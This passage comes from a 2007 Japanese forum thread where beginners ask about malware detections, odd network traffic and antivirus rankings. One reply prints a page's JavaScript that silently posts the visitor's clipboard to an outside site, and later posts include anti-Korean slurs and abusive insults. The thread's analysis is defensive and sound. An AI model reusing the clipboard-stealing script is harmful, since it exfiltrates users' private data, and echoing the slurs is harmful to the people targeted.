今回のパッチ、更新検索中に、WinXP+Office2003の環境で異様に重くなる場合あるそうな。
MSでも原因不明。svchostの奴で多少はましになるけど、責任は知らん、Officeを2007かXPにしろ
というお達しが、うちの会社で出た。
435 名前:名無し~3.EXE[sage] 投稿日:2007/05/10(木) 00:12:29 ID:FEz1XhvZ
WinXP+Office2003の環境で重くなる件について
うちの会社ではsvchostの奴をやって
Windows Updateのページに行って、左のメニューから「設定の変更」へ行き
「Windows Update をしない」みたいのを選んだら直った。
(適用したら見えなくなったので正確な名称じゃないかも)
システムのプロパティ内「自動更新を無効にする」にチェックして適用+OKクリック。
その後、WindowsUpdateのサイトで手動ダウンロード&インストールする。
ADSL回線や光回線でもこの現象が見られるという報告があがってます。
WinXP+Office2003の環境の人は気をつけてください。
*この文章を該当しそうなスレッドにコピペしてください。
よろしくお願いしますm(_ _)m
105:名無しさん@お腹いっぱい。
07/05/10 22:20:17
今頃言われてもなぁ
異様に重かったのは、やっぱ異常だったんか
106:名無しさん@お腹いっぱい。
07/05/10 22:35:54
Win板のUpdate失敗スレ見ろよ…
107:名無しさん@お腹いっぱい。
07/05/12 00:16:23
HPにgoogleを登録していたのですが、いつのまにかbiglobeに変わっていました。
ウィルスかなにかに感染してしまったのでしょうか・・・?
108:名無しさん@お腹いっぱい。
07/05/12 02:18:01
>>107
戻らないってことならNECサイトだか121だかに
対処方法が書かれていたと思う
109:名無しさん@お腹いっぱい。
07/05/12 05:50:45
【使用PC】 「SONY VAIO JX」
【使用OS】 「Windows XP (VAIO付属のもの)」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVAST4.7 Home Edition」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」
【どんな症状が出るか】 「スピーカーから不定期に『くしゃっ・・・くしゃっ』という音が出ます。年に数回OSを入れなおしますが、いつの間にか音が出ています。どなたかお分かりの方いらっしゃいませんか?」
110:名無しさん@お腹いっぱい。
07/05/12 06:25:39
ウイルスとか関係ねーし。
ハード(ノイズ拾ってるなど)やドライバの問題だろ。
PC一般板のVAIOスレにでも行け。
111:名無しさん@お腹いっぱい。
07/05/12 10:35:12
VAIO(笑)
112:名無しさん@お腹いっぱい。
07/05/12 12:44:11
>>109
ああ、それはウィルスで間違いないよ。
すぐに病院行って抗生剤もらってこい。
113:名無しさん@お腹いっぱい。
07/05/13 02:01:18
URLリンク(ime.nu)
これウイルスらしいんだけど、どんなウイルス?
114:名無しさん@お腹いっぱい。
07/05/13 03:07:16
programfilesの中身がどんどん消されていくウイルスって最近報告ありました?
ウイルスバスターにもonecareにも引っかからないみたい。
115:名無しさん@お腹いっぱい。
07/05/13 03:15:21
>>114
whiter ならダウンロード板かな?
116:名無しさん@お腹いっぱい。
07/05/13 04:15:36
>>113
ime.nu外せ。鑑定は初級ネット板でどうぞ。
>>114
原田じゃねーの? >>13
117:名無しさん@お腹いっぱい。
07/05/13 10:47:50
スレリンク(sec板:273-278番)
118:名無しさん@お腹いっぱい。
07/05/13 12:54:57
>>114
ウイルスバスターとonecareを信用してるようじゃね・・・
119:名無しさん@お腹いっぱい。
07/05/13 15:28:43
>>108
エスパー発見
120:名無しさん@お腹いっぱい。
07/05/15 00:47:37
失礼します。ちょっと質問させてください。
以前ウイルスに感染しました。
最新アップデートを行ったAVGとspybot両方でフルスキャンを通常状態とセーフモードで
かけたところとりあえず症状は出なくなりましたが、その頃から
インターネットエクスプローラーの
ツール→インターネットオプション→プライバシーの
cookieの設定を中などに設定してもしばらくすると勝手に低(すべてのcookieを受け入れる)
に変わってしまうようになりました。これはウイルスかスパイウェアの活動によるものでしょうか?
詳しい方のアドバイスお願いします。
以下補足ですが、
ウイルス感染中に
c\windowsフォルダ内に
*****.exe(5桁の数字)
eraseme_*****.exe(同上)
が複数増殖してAVGがたまにその一部を削除していく、
という症状が出ていました。
また、ダイアラー(delsim ダイアラ)が勝手に立ち上がったり
インターネットエクスプローラーが勝手に立ち上がり広告サイトが
勝手に開くこともありました。
OSはウィンドウズ2000、
使用しているウイルス対策ソフトはAVG、
スパイウェア対策はspybot-Search & Destroy
です。
121:名無しさん@お腹いっぱい。
07/05/15 01:17:09
>>120
スパイウェアの中にはブラウザの設定を落として、
次々と他のスパイウェアを呼び寄せる悪質なのがあります
122:名無しさん@お腹いっぱい。
07/05/15 01:21:55
2000でFW無しなのかねえ
とりあえず>>9ぐらいやれと。
123:名無しさん@お腹いっぱい。
07/05/15 19:48:33
こんばんは。
セキュリティソフトがIPを遮断しますか?と出たIPを調べたら
URLリンク(www.apnic.net)
から何回もアクセスされていました。
このサイトはどんな機関なのでしょうか?
わかる方、教えてください。
124:名無しさん@お腹いっぱい。
07/05/15 19:51:31
123ですが、表示されていたIPは125.54.39.204です。
よろしくお願いします。
125:名無しさん@お腹いっぱい。
07/05/15 19:53:10
KD125054039204.ppp-bb.dion.ne.jp
126:名無しさん@お腹いっぱい。
07/05/15 20:11:41
>>123
俺も以前そこから執拗なアクセスされたことある。
全部ルーター&FWが弾いたけど、何回もしつこいよな
うちはガード固いんだから、とっとと諦めろって言ってやりたい
なんなんだ?APNICって
127:名無しさん@お腹いっぱい。
07/05/15 20:40:14
もしかして釣り? それともボケ?
128:名無しさん@お腹いっぱい。
07/05/15 21:09:47
最近しばしばshare のdown フォルダにPrevHost というフォルダと、その中にindn.dat というファイルが自動で生成されることがあります。
ググっても、share の質問スレで聞いても回答が得られなかったのですが、何だか分かる方いましたら教えてください。
129:123
07/05/15 21:50:07
>>127
IDが変わっていますが123です。
釣りでもないし、ボケているつもりもありません。。
さっきから同じような感じで6回もアタックされました。
こんな事は初めてで何かわかりません。
これは一体何なのか教えていただけますか?
130:名無しさん@お腹いっぱい。
07/05/15 22:50:53
APNICは君が逆引きで調べたWhoisそのもの
ちなみにそのIPはKDDI(DION) >>125
131:名無しさん@お腹いっぱい。
07/05/15 23:00:47
じゃあAPNICからアタックがあったポートは
別に開放しちゃっても問題ないんですか?
132:名無しさん@お腹いっぱい。
07/05/15 23:03:47
だからAPNICからアタックされてるんじゃないって
アッタクしてるのはどっかの感染者か踏み台にされてるPC
133:名無しさん@お腹いっぱい。
07/05/15 23:08:19
言い忘れたけどそういうアタックは日常茶飯事的にある
うちもルーターのログを見ればいっぱいあるから
134:名無しさん@お腹いっぱい。
07/05/15 23:09:31
なるほど。なんとなく理解できました。
安心しました。ありがとうございました。
135:123
07/05/16 00:20:14
123です。
皆さん、丁寧に教えて下さってありがとうございました。
私も一安心しました。
ファイヤーウォールのソフトにも感謝して寝る事にします。
おやすみなさい。
136:名無しさん@お腹いっぱい。
07/05/17 14:35:38
age
137:名無しさん@お腹いっぱい。
07/05/17 17:40:01
【使用OS】 「WindowsXP」
【使用セキュリティソフトとバージョン】 「NTTセキュリティ対策ツールver15」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」
【スパイウェア対策ソフト】 「NTTセキュリティ対策ツールver15」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか】
・TSPY_Backdoor
・検出リソース→ C:WINDOWS\system32\drivers
・検出対象→Zcsfzdjh.sys
検出して削除はしたのですが、トロイの木馬として検出されたので
まだ不安です。ぐぐってみてもバックドアは色んな種類が居て、どんな悪さをするのかよく解りません。
TSPY Bsckdoorで検索をかけてみましたが、見つけられませんでした。
対処はこれでよかったのか、それとどんな症状が出るのか教えて欲しいです。
PC初期化したほうがいいんですかね・・?
138: ◆N9P3SuvBPo
07/05/17 18:06:34
>137
不正ドライバか?
>Zcsfzdjh.sys
削除したんなら問題ないと思うけどな…
139:名無しさん@お腹いっぱい。
07/05/17 20:52:46
Zcsfzdjhでファイルとレジストリ検索しといたほうがいいんじゃね
140:名無しさん@お腹いっぱい。
07/05/18 07:14:21
ありがとうございます。
ファイル検索では引っかかりませんでした。
レジストリ検索っていうのは、ぐぐったら出てくるレジストリ検索のソフト使えばいいのかな?
あと、一応ネット通販とかのパスワードを変更しておいたほうがいいですかね?
141:名無しさん@お腹いっぱい。
07/05/18 11:31:04
>レジストリ検索
俺はこれを愛用してる
RegGlass
URLリンク(hp.vector.co.jp)
142:名無しさん@お腹いっぱい。
07/05/18 15:50:12
只今ノートンスレにて炎上中の話題。
昨夜の定義ファイル更新でBackdoor検出。
Backdoor_Haxdoor: 「c:\WINDOWS\sysytem32\drivers\CO_Mon.sys」
「シマンテックのオンラインスキャンでウイルス検出を実行した際にダウンロードされるCO_Mon.sysで
Backdoor.Haxdoorが検出される。」
「シマンテックのオンラインスキャン以外にもCO_Mon.sysが入る経路があるのかも知れん」
感染経路は?本当にBackdoor?等、いまだに詳細は不明。
【ノートン】インターネットセキュリティ Ver.113【2007】
スレリンク(sec板:486番)
143:名無しさん@お腹いっぱい。
07/05/18 16:09:53
騒いでるの一人だけじゃん…。
普通にどこかで踏んだんだろ。
144: ◆N9P3SuvBPo
07/05/18 18:34:13
>142
誤検出だったという展開になってるようだけど。
c:\windows\ntbtlog.txtに
「Loaded driver \SystemRoot\System32\Drivers\CO_Mon.sys」が
存在しないか確認を。無いと思うけどね。
145:名無しさん@お腹いっぱい。
07/05/18 20:18:02
ほんとにhaxdoorだったらえらいこっちゃ
146:名無しさん@お腹いっぱい。
07/05/18 20:38:30
Rootkitだもんな
147:名無しさん@お腹いっぱい。
07/05/18 21:26:22
>144
そのc:\windows\ntbtlog.txtってなんなの?
spybotがいつも反応するんでセーフモードで消したけど、すぐ復活するし。
頭にきてOS再インスコしたけどたかまた出てくるんだが。
148: ◆N9P3SuvBPo
07/05/18 21:32:10
>147
ブートのログ
起動時に読み込まれた(または読み込まれなかった)ドライバが表示される
F8起動オプションの、セーフモードで起動した時や、
「ブートのログ作成を有効にする」を選んで起動した時に作成される。
(一旦作成してしまうと、起動する度に内容が追記されてサイズが増えて行く)
149:名無しさん@お腹いっぱい。
07/05/19 13:25:36
すまんタスクマネージャーにtgui.exeってのとtgsvc.exeっていうのが急に出現してメモリ使いまくってるんだがこれってなんなのかわかる奴いない?
最近ウィルス踏んだばっかりだから気になるんだが…
150:名無しさん@お腹いっぱい。
07/05/19 13:32:12
>>141
ありがとうございました。
何も引っかかりませんでした。
これで一安心なのかな・・?
アドバイスくれた皆様、ありがとうございました~
151:名無しさん@お腹いっぱい。
07/05/19 14:31:03
>>149
検索すらしないのかよ
152:名無しさん@お腹いっぱい。
07/05/19 15:07:48
>>151
だからみんなスルーしてるだろ
153:名無しさん@お腹いっぱい。
07/05/19 15:37:55
了解。
154:名無しさん@お腹いっぱい。
07/05/19 15:51:10
人
~( ○)
(_ ゚T゚
゚ ゚̄
155:名無しさん@お腹いっぱい。
07/05/22 12:58:56
URLリンク(omanchin.com)
これってどういうものですか?
ノートンが反応するそうです。
解説お願いします。
156:名無しさん@お腹いっぱい。
07/05/22 13:07:36
>>155
クリップボードのデータを盗まれたお・・おっおっおっ
157:名無しさん@お腹いっぱい。
07/05/22 13:07:42
>>155
これ、JPGじゃねーよ。
158:名無しさん@お腹いっぱい。
07/05/22 13:11:52
>>155
※ clipboardData.getDataが使われているようです。
以後こちらへどうぞ
勇気がなくて踏めない人のための鑑定スレPart14
スレリンク(hack板)
159:名無しさん@お腹いっぱい。
07/05/22 13:16:14
DR,webもブラクラチェックも大丈夫そうだが、
チキンな俺は踏まない。
つか、>>155危険なリンク貼るな。スレ違いだボケ
専ブラで画像自動表示してる人だっているんだから、
少しでも危険なリンク貼るならht位まで消してから貼れ。今度やったら通報する。
160:名無しさん@お腹いっぱい。
07/05/22 13:25:48
>>155
※ clipboardData.getDataが使われているようです。
161:名無しさん@お腹いっぱい。
07/05/22 13:43:03
<form method="post" name="bbs" action="URLリンク(omanchin.com)
<input type="hidden" name="paste" value="">
<INPUT type="hidden" name="k" value="あ">
<INPUT type="hidden" name="chktime" value="1179759460">
<INPUT type="hidden" name="title" value="">
</form>
<script type="text/javascript">
<!--
document.bbs.paste.value = clipboardData.getData("Text");
document.bbs.submit ();
// -->
</script>
クリップボードのデータを送信しちゃいますよ~って。
162:名無しさん@お腹いっぱい。
07/05/22 13:49:18
「このWebページがクリップボードへアクセスするのを許可しますか?」→「許可しない」
さすがIE7、なんともないぜ。
163:名無しさん@お腹いっぱい。
07/05/22 13:51:05
クリップボードのデータ送信されたら
あんなエロイ事や、こんなエロイ事を検索したのがバレちゃうじゃんか!!111!!!1
164:名無しさん@お腹いっぱい。
07/05/22 13:52:15
ウイルスコードをクリップボードにコピーして踏めばいいんじゃね?
165:名無しさん@お腹いっぱい。
07/05/22 13:55:06
>>164
w
166:名無しさん@お腹いっぱい。
07/05/22 13:56:34
>>159
馬鹿ですか?
聞くまでもなく馬鹿ですよね
167:名無しさん@お腹いっぱい。
07/05/22 14:04:03
clipboardData.getDataって取得できるサイズに制限無いの?
50MBのテキストコピーして踏んでみたが、ちゃんと送信されてるっぽい。
168:名無しさん@お腹いっぱい。
07/05/22 14:07:36
あ、違った。5MBだった。
169:名無しさん@お腹いっぱい。
07/05/22 14:12:45
制限無いんじゃね?
メモリ食いつぶすまで行けると思うが、先にクリップボードが死ぬかと。
170:名無しさん@お腹いっぱい。
07/05/22 15:33:31
>>159
何でお前がこのスレにいるのか分からない。
チキンで踏めもしないのに、此処でグダグダ言うお前って何様?
171:名無しさん@お腹いっぱい。
07/05/22 15:35:59
> 専ブラで画像自動表示してる人だっているんだから、
こんな人もセキュやってるんだと思うと笑えてくるよな
pink板へ逝けよ
172:名無しさん@お腹いっぱい。
07/05/22 17:16:36
いきなりブラクラもどき貼る馬鹿よりマシじゃねw
173:名無しさん@お腹いっぱい。
07/05/22 17:19:41
>>155
通報しますた
174:名無しさん@お腹いっぱい。
07/05/22 17:35:43
>>155
じゃあ俺も通報しとくわ
175:名無しさん@お腹いっぱい。
07/05/22 17:39:40
じゃあ有名な奴を直リンで
URLリンク(www2.strangeworld.org)
176:名無しさん@お腹いっぱい。
07/05/22 17:42:32
アク禁になるぞ
177:名無しさん@お腹いっぱい。
07/05/22 18:26:01
アク禁になるだけならまだいいけど、
2ちゃんからプロバイダに連絡行って強制解約になったやつもいるからな
匿名でID出ないからって、あんまり調子に乗ってウイルス貼るのはやめたほうがいい
178:名無しさん@お腹いっぱい。
07/05/22 18:30:33
ゆとり君はほっとけ
179:名無しさん@お腹いっぱい。
07/05/22 18:44:33
とりあえず>>175は通報してアク禁にしちゃいましょう^^
180:名無しさん@お腹いっぱい。
07/05/22 19:14:27
>>155は
URLリンク(omanchin.com) ここの点呼みたいだけどな。
181:名無しさん@お腹いっぱい。
07/05/22 19:27:35
まぁ、なんでもいいけど、訳分からんスレ違いなものを貼るな禿って事だな
182:名無しさん@お腹いっぱい。
07/05/23 23:15:26
愚問かも知れないが教示頂けませんか?
1、LANネットワークを共有するウィルス・スパイウェアの存在の有無
2、A─B環境で、AにあるウィルスをBから起動させると感染するのはA?B?両方?
183:名無しさん@お腹いっぱい。
07/05/23 23:40:41
>>182
1 : 共有の意味がよくわからないけど、以前問題になったMSBlustは、ローカルエリア
内のほかのコンピュータに感染する動作をしていた。また、共有フォルダを破壊、改変する
タイプもある。
2 : なぜAにウイルスがあるのかが問題。Aがすでにウイルスに感染している可能性も
ある。そうでなければ、Bから起動させた場合、通常感染するのはBだけ。ただし、Aにい
ファイアーウォールソフトがなければ、場合によってはその後Aに感染するリスクはある。
上に書いたような共有フォルダを破壊するようなタイプなら被害はBにも及ぶかもしれない。
いずれにしてもウイルスの挙動は千差万別で、一般論は通用しないので注意してほしい。
184:182
07/05/23 23:54:37
>>183
レス感謝です 説明が下手で申し訳ないですが
一応把握しました
1、はAが感染していたらBも感染するか聞きたかったんです
2、は「千差万別」=「する物もある」で理解しました
>なぜAにウイルスがあるのかが問題
ウィルスと確定した訳では無いのですが
単に「不明なファイル」があると言うことです
185:名無しさん@お腹いっぱい。
07/05/24 12:00:02
JAVAアプレットを立ち上げるとIEが原因でkernel32.dllにエラーが・・・
とでて、強制終了させられます。
avastのフリーソフトでウイルス駆除したのですが改善されません。
システムのなかにjacbgage.dllという不明なものもありました。
どうしたらいいでしょうか・・・・
186:名無しさん@お腹いっぱい。
07/05/24 23:09:22
URLリンク(countfuyashi0gokun.blog50.fc2.com)
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。
187:名無しさん@お腹いっぱい。
07/05/24 23:18:40
>>186
セキュリティ初心者質問スレッドpart89
スレリンク(sec板:469番)
469 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:02:57
URLリンク(countfuyashi0gokun.blog50.fc2.com)
すみません。このページにウィルスめいたものがあるか調べることは可能でしょうか??
不安で夜も眠れないのでよろしくお願いいたします。
誘導されただろ 貼ってもらわないと行けないなら踏め
勇気がなくて踏めない人のための鑑定スレPart14
スレリンク(hack板)
188:名無しさん@お腹いっぱい。
07/05/24 23:23:04
541 名前:名無しさん@お腹いっぱい。[] 投稿日:2007/05/24(木) 23:06:48
URLリンク(countfuyashi0gokun.blog50.fc2.com)
わけのわからないページを踏んでしまいました。このページ内に何か問題はありますでしょうか?
ワープとかいう所がひたすら重かったです・・・。
よろしくお願いいたします。
どれだけマルチするつもりか知らんけど
フラッシュ再生するだけだから勝手に踏んだらいい
189:名無しさん@お腹いっぱい。
07/05/24 23:28:07
セキュ板に常駐してる人間をなめてんな
マルチしてもばれないと思ったら大間違いだつうの
190:名無しさん@お腹いっぱい。
07/05/25 01:16:46
新種ルートキット情報
スレリンク(sec板:410番)
191:名無しさん@お腹いっぱい。
07/05/25 03:17:13
AV-Test.orgという専門機関のアンチウイルス検知力テスト結果(2007年05月22日)
AV-Test.org Reports Stats from Antivirus Roundup
URLリンク(www.pcmag.com)
01位)WebWasher 99.83%
02位)AVK 2007 99.56%
03位)AntiVir 99.42%
04位)F-Secure. 97.93%
05位)Symantec 97.77%
06位)Kaspersky 97.64%
07位)Fortinet. 97.06%
08位)Avast!. 96.32%
09位)AVG. 96.15%
10位)Rising 96.02%
11位)BitDefender 95.68%
12位)Norman.. 94.66%
13位)Ikarus.. 92.54%
14位)Panda. 92.09%
15位)Trend Micro.. 90.97%
16位)Nod32. 88.32%
192:名無しさん@お腹いっぱい。
07/05/25 16:30:13
厨な質問なんだがyoutubeとかニコニコとかの動画サイトでウィルスとかあんの?
193:名無しさん@お腹いっぱい。
07/05/25 16:36:47
>>192
それが人に物をたずねる態度か
死ねクズ蟲
ゴミ収集車に巻き込まれて 頭粉砕されて死ね
194:名無しさん@お腹いっぱい。
07/05/25 19:26:51
まさにそうなって欲しいアホがレスしてるのがなんとも言えないねぇ…
195:名無しさん@お腹いっぱい。
07/05/25 19:28:26
あるある
196:名無しさん@お腹いっぱい。
07/05/25 19:29:13
ねぇねぇ
197:名無しさん@お腹いっぱい。
07/05/26 00:58:03
※アンチウイルスNOD32の脆弱性情報
スレリンク(sec板:540番)
198:名無しさん@お腹いっぱい。
07/05/27 12:13:05
マルウェア注意
マカフィー・ユーザーのブログに、
ワードパッドなどで簡単に埋め込める悪質なオブジェクトがあることが紹介されていたのでご注意です。
マイクロソフトやマカフィー、シマンテック(ノートン)、kasperuskyなどの
多くの主要なベンダーは、既に対応していますが、
アンラボやNOD32など一部のベンダーは、まだ未対応なので気をつけて下さい。
*マカフィー・ユーザーの検証ブログ
URLリンク(www.avertlabs.com)
199:名無しさん@お腹いっぱい。
07/05/27 13:56:00
ユーザーのブログじゃねーよ。
AVERTはMcAfeeの解析チームだ。
200:名無しさん@お腹いっぱい。
07/05/27 22:08:01
単にOLEで埋め込んだだけのように思うのだが・・・
いったい何が危険なんだ?
201:名無しさん@お腹いっぱい。
07/05/27 22:13:05
メールの添付ファイルとして届く→興味を誘うような文章を書く。
クリックするほうがアホwとか言うならワンクリやフィッシングも対策いらん。
ま、そのブログのエントリはあくまで技術的なネタであって、
トロイとして実用的かどうかは本題じゃないでしょ。
202:名無しさん@お腹いっぱい。
07/05/28 10:56:49
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「internet security 2006(7かも?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新しています」
【スパイウェア対策ソフト】 「上記のセキュリティソフトにて」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「上記のセキュリティソフトにて」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も検出されず、昨日から突然『セキュリティリスクWscript.kakwormを検出して遮断しました』のようなメッセージが、5分未満の間隔で限りなく・・・」
【どんな症状が出るか】 「例)\Content.IE5\9NJV9DS6\api[1].xml、からWscript.kakwormが検出されて、上記のエラーが。」
【症状が出る前に何をやったか】 「いつもどおりで、これといって特別なことはしていません」
【症状を解決しようとどのような処置を取ったか】 「content.IE5の中のファイルをindexを除き削除しました」
【その他の質問】 「」
content.IE5の中のファイルをindexを除き削除すると、昨夜収まったのですが、
先ほど突然昨夜と同様の症状が・・・。
よくよくcontent.IEを見ていると、消してIEも何も起動していないのに
ファイルが次々出現します・・・(これは正常なのかな?)
すみません、質問しておいて申し訳ないのですが、これから病院にいかなくてはならないので、
どなたか読んでお答えいただければ幸いです
203:202
07/05/28 12:37:53
ただいま戻りました。
セキュリティソフトのログを確認したところ、
content.IE5を空にしてから病院に行っている間は
上の症状は出ていなかったみたいです。
しかし、やはりcontent.IE5の中にいくつか、HPの読み込みなどをしていないのに
消してもすぐ出てくるファイルやフォルダが10個強あります。
これについて知っている方がいれば教えていただけますでしょうか?
204:名無しさん@お腹いっぱい。
07/05/28 17:24:33
>>202
URLリンク(www.symantec.com)
205:202
07/05/28 18:05:21
>>204
返信ありがとうございます
その辺は自分でも探して既に対策を講じてみたのですが
ファイルどころかレジストリも存在しなかったので、
そのページの通りにやっても変化はありませんでした。
何もしていないのに、content.IE5に勝手にファイルが作成されるところが
個人的には変な感じがするのですが、そういう状態について
知っている方がいれば、教えていただければと
206:名無しさん@お腹いっぱい。
07/05/28 18:35:29
>>205
NIS以外のソフトでスパイウエアスキャン。
「何もしていない」という時のプロセスをチェック・接続ログをチェック。
IEのウインドウを表示させなくても通信はできる。
207:202
07/05/28 19:52:57
>>206
なるほど
とりあえず何かしらの手段を使ってスパイウェアのスキャンをかけたいと思います。
208:名無しさん@お腹いっぱい。
07/05/28 21:59:53
WORM_SDBOT.EFHが消せません。
タスクでそのプロセスを終了しようとしても終了できませんでした。
このウイルスが削除できなくて、昨日、再インストールしたのですが、
今日の夕方に、すでに同じウイルスに感染。
環境は、CATV、ウイルスバスター2007使用です。
再インストールをもう一度してもいいけど感染経路がわかりません。
本日逝った先は、yahooとヤフオク関連のみ。
どうしていいかわかりません。
詳しい方お願いします。
209:名無しさん@お腹いっぱい。
07/05/28 22:14:09
WORM_SDBOT.EFH
侵入方法:共有フォルダ内に自身のコピーを作成して侵入
セキュリティホールの利用:MS00-035
>感染経路がわかりません
ふ~ん。わからないんだーw
210:名無しさん@お腹いっぱい。
07/05/28 22:36:22
リッチテキストマルウェアがウイルス対策ソフトの盲点を突く?
URLリンク(www.itmedia.co.jp)
今時分はどうだろ?どこが×でどこが○とはかかれてないけどさ
211:名無しさん@お腹いっぱい。
07/05/28 22:38:40
PCに共有フォルダは設定していません。
209さんのレスされたことはTREND MICROに書かれてました。
212:名無しさん@お腹いっぱい。
07/05/28 22:52:09
>>211
管理共有は?
213:名無しさん@お腹いっぱい。
07/05/31 02:04:34
すいませんがどなたか教えてください。
先程、2チャンの動画を見てたら(downloadはしてないです
ハードウェアに不具合がありますみたいな感じのコメントと
英語のコメントが出てきて、エラーになり電源が落ちては再起動になるの繰り返しなんですがウィルスですよね?
素人ですいません。
214:名無しさん@お腹いっぱい。
07/05/31 02:08:59
>>213
>みたいな感じのコメントと
>英語のコメントが
>エラーになり
全部書けw
ウィルスだと思うならスキャンしなされ
215:名無しさん@お腹いっぱい。
07/05/31 02:14:28
スキャンしたいのですが起動してから何をしようにもすぐに電源が落ちてしまい又再起動の繰り返しなんです。
素人でうまく説明できずに本当に申し訳ないです。
216:名無しさん@お腹いっぱい。
07/05/31 02:16:24
>>215
SafeModeで起動後システムの復元では?
217:名無しさん@お腹いっぱい。
07/05/31 02:29:24
すいません。
そのモードはどの様にすればよろしいのでしょうか?
218:名無しさん@お腹いっぱい。
07/05/31 02:31:40
>>217
再起動時にF8を連打!
219:名無しさん@お腹いっぱい。
07/05/31 02:32:21
F8あたりを起動後に連打
詳細はPCの取説(多少機種によって相違あり)
220:名無しさん@お腹いっぱい。
07/05/31 02:40:32
連打してみたら英語の画面になり、f1キーf2キーが何たらと出てきましたがこれのことでしょうか?
後、起動してから落ちるまでの間に、右したの方にユアcomputer インフェクテッド?と書いた題名でアンチスパイゥェア フォーユーみたいな英語が出てくるのですが何でしょうか?
意味わからなくてすいません。
221:名無しさん@お腹いっぱい。
07/05/31 02:42:05
>>220
テンプレ埋めれ、嫌ならリカバれ
222:名無しさん@お腹いっぱい。
07/05/31 02:45:58
>>220
URLリンク(www.higaitaisaku.com)
223: ◆N9P3SuvBPo
07/05/31 18:37:59
>213
まだ生きてる?
2チャンの動画じゃなくて、youtubeで動画じゃないのか。
ま、症状見るからにして、マルウェアにやられてるってことには違いないが。
224:名無しさん@お腹いっぱい。
07/06/02 14:37:35
>>210
元ねたのマカフィーのブログにはVirusTotalのスクリーンショット載ってるよ
参加してないベンダーの対応状況はわかんないけど
225:名無しさん@お腹いっぱい。
07/06/02 18:05:01
URLリンク(www.av-comparatives.org)
URLリンク(www.itmedia.co.jp)
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。
226:名無しさん@お腹いっぱい。
07/06/03 13:28:38
最近またNODの工作員必死だなw
そんな事してる暇あったら、新 種 の 未 対 応 ウ イ ル ス どうにかしろよw
NOD未対応ウイルスが世界中に溢れてますよw
他社は、ほとんど対応してるのにねw
NODみたいな糞AVがあると、それを使っている馬鹿信者がウイルス広げて迷惑です><
人の迷惑考えないで糞NOD薦める暇あったら、早く氏んでください。
227:名無しさん@お腹いっぱい。
07/06/03 13:51:13
マルチは基地外の証
228:名無しさん@お腹いっぱい。
07/06/03 13:57:02
いちいち反応するのが一番の基地外
229:名無しさん@お腹いっぱい。
07/06/03 14:17:11
反応する方がキチガイってどういう詭弁だよ
低脳は言うことが違うな
230:名無しさん@お腹いっぱい。
07/06/03 14:23:57
基地外 詭弁 低脳
┏┳┓ ハイッ. ┏┳┓
┏┫┃┃ 差別は ┃┃┣┓
┃┃┃┣┓ ここまで ┏┫┃┃┃
┃ ┃┃┏━━┓┃┃ ┃
┃ 差別 ┣┫ ・∀・ .┣┫ ダメッ.┃
┗━━┛┗┳━┳┛┗━━┛
┏┻┓┃
┏━┛ ┣┻┓
┗━━┫ ┗━┓
. ┗━━┛
231:名無しさん@お腹いっぱい。
07/06/03 14:27:10
認定厨がよく言うw
232:名無しさん@お腹いっぱい。
07/06/03 14:28:52
____ ( ) 。
〃  ̄ ヾ、 ( ) )
i!_,.┻ 、!i_ ノノ
/o  ̄ ̄ ノ ノ
. i.0 .イ
. ゝ_____.ノ
233:名無しさん@お腹いっぱい。
07/06/03 17:49:04
朝鮮人の手法です。根拠のないものでも、言い続ける。
面倒だし馬鹿馬鹿しいと反論せず放置してくれれば、
知らない人にとってはそういうものかと感じられるようになり、
それが事実だと認識されるようになる。
234:名無しさん@お腹いっぱい。
07/06/03 20:27:27
と、NOD厨の糞チョンが言ってます。
おまえら在日はまず、年金や税金を俺ら日本人並みにちゃんと払え
屑ゴキブリ氏ね
235:名無しさん@お腹いっぱい。
07/06/03 20:34:24
板違いだ。消えろ。
236:名無しさん@お腹いっぱい。
07/06/03 21:22:51
RTF埋め込み型早速出てきてるみたいだな
URLリンク(www.trendmicro.co.jp)
237:名無しさん@お腹いっぱい。
07/06/04 15:00:35
Trojan.Packed.NsAntiが削除できないんですがどうすればいいでしょうか。
ウィルスソフトはノートンアンチウィルス2006です。
238:名無しさん@お腹いっぱい。
07/06/04 15:03:09
>>237
URLリンク(www.symantec.com)
239:名無しさん@お腹いっぱい。
07/06/04 15:19:47
>>238
すいません読んだのですがよくわかりませんでした。
何をしたらいいんでしょうか。
240:名無しさん@お腹いっぱい。
07/06/04 15:29:00
Trojan.Packed.NsAnti として検出されたファイルは、有害である可能性があります。
お使いのコンピュータ上で Trojan.Packed.NsAnti として検出されるファイルを発見した場合、
そのファイルを Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、
「スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法」をご覧ください。
241:名無しさん@お腹いっぱい。
07/06/04 21:54:55
新種のpackerか
242:名無しさん@お腹いっぱい。
07/06/05 02:49:54
【使用OS】 「WinXP MCE2002 SP2 PCは1年前にDELLで通販購入」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター12 使用期限○」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「Ad-aware、Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
